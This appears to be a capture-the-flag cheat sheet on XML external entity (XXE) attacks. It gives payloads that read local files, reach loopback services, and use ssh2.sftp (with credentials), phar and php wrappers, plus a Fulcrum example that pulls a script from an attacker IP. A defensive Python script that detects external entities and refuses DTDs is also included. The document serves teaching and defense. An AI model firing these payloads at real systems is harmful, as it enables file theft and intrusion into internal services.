Headers:
To exploit an XXE, the request's Content-Type must be text/xml:
POST /action HTTP/1.0
Content-Type: text/xml
File Reading
When exploring an XXE, use the tags the application itself expects; in this scenario the entity &xxe; is referenced inside the user tag:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
SSRF attacks
Sometimes a service is only reachable locally, so use the loopback address to reach internal resources on the victim machine:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1/2ndGrade/ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
SSH2.EXEC, SSH2.SHELL, SSH2.SFTP, SSH2.TUNNEL, SSH2.SCP
The ssh2 stream wrappers may be enabled on the target while testing an XXE, so it is worth trying payloads that retrieve files from the system through them:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "ssh2.sftp://3rdgrader:3rdgrader@127.0.0.1/ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
PHAR
The phar wrapper allows a specific path inside an archive to be read:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "phar://tmp/ETSCTF-10.10.1.250.tar/ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Custom Wrappers
Sometimes custom or less common wrappers are available to the XML parser; fuzzing the wrapper scheme is a good way to find out whether any exist:
Example 1:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://fd/375" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Example 2:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://temp" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
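The payloads in the sections above differ only in the wrapper named in the SYSTEM identifier (file, http, ssh2.sftp, phar, php), so the defender's check is the same for all of them. As an added example that is not part of these notes, the following Python script (standard-library expat only) does two things: it lists every external entity a document declares without resolving any of them, which is a usable detection hook or log enrichment for a text/xml endpoint, and it parses the creds document the way the application should, refusing any DTD outright. The sample payload embedded below is the file-read one from the File Reading section; the benign document, the error class and the function names are constructed for this example.

```python
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Raised when a document carries a DTD; the hardened parser accepts none."""


# Sample inputs, constructed for this example. PAYLOAD is the file-read
# payload from the notes above; BENIGN is what the endpoint is meant to get.
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///ETSCTF" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>"""

BENIGN = b"""<?xml version="1.0"?>
<creds><user>alice</user><pass>mypass</pass></creds>"""


def audit_external_entities(xml_bytes):
    """Return (name, system_id) for every external entity the DTD declares,
    without resolving any of them. A non-empty result on a creds endpoint is
    an XXE attempt, whatever wrapper scheme the SYSTEM identifier names."""
    findings = []
    parser = expat.ParserCreate()
    # Never fetch an external DTD subset named in <!DOCTYPE x SYSTEM "...">.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None:
            findings.append(("DOCTYPE", system_id))

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # SYSTEM or PUBLIC => external entity
            findings.append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        return 1  # tell expat the reference is "handled"; nothing is read

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)
    return findings


def parse_creds_hardened(xml_bytes):
    """Parse <creds> into {"user": ..., "pass": ...}, rejecting any DTD.

    Refusing the DOCTYPE itself (not just external entities) also blocks
    entity-expansion denial of service such as "billion laughs"."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.buffer_text = True  # deliver each text node in a single callback

    result, stack, text = {}, [], []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # An exception raised in a handler stops expat and propagates from Parse().
        raise UnsafeXmlError("DTD not accepted (DOCTYPE %s)" % name)

    def on_start(name, attrs):
        stack.append(name)
        text.clear()

    def on_chars(data):
        text.append(data)

    def on_end(name):
        if len(stack) == 2:  # direct child of the root element, e.g. <user>
            result[name] = "".join(text).strip()
        stack.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(xml_bytes, True)
    return result


if __name__ == "__main__":
    print(audit_external_entities(PAYLOAD))  # [('xxe', 'file:///ETSCTF')]
    print(parse_creds_hardened(BENIGN))
    try:
        parse_creds_hardened(PAYLOAD)
    except UnsafeXmlError as exc:
        print("rejected:", exc)
```

The audit function reports the declared SYSTEM identifier verbatim, so the same log rule catches file://, http://127.0.0.1/, ssh2.sftp://, phar:// and php:// payloads alike; the hardened parser never needs to know which wrappers the runtime supports, because it refuses the DTD before any entity is declared.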
Examples: ECHO CTF elementary
External Entities
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://10.10.14.3/pwned.js" > ]>
<Heartbleed>
<Ping>&xxe;</Ping>
</Heartbleed>
Examples: Fulcrum
XXE Blind Out of Band
For further details read the XXE Blind Out of Band post.